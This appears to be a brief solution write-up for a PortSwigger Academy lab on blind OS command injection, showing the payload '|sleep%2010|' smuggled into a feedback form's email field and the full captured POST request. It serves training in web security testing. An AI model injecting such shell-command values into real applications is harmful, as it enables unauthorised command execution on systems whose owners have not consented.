Skip to content

Port Swigger Blind OS command injection with time

Blind OS command injection with time delays

Solution

Open the website: https://0aa60066030e14278284d30b004b0016.web-security-academy.net/feedback

https://0aa60066030e14278284d30b004b0016.web-security-academy.net/feedback

Input payload

Wait 10 sec
Payload: |sleep%2010|
Payload in [email protected]|sleep%2010|
---
POST /feedback/submit HTTP/2
Host: 0aa60066030e14278284d30b004b0016.web-security-academy.net
Cookie: session=zn4w45SHDlJbZepcwNT7LT8QHAf5eWSi
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 99
Origin: https://0aa60066030e14278284d30b004b0016.web-security-academy.net
Referer: https://0aa60066030e14278284d30b004b0016.web-security-academy.net/feedback
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers

csrf=6V5wwa8JckTGuFAgqLJm0UZWxFIkXFFV&name=Jan&[email protected]|sleep%2010|&subject=Temat&message=aaa

Solved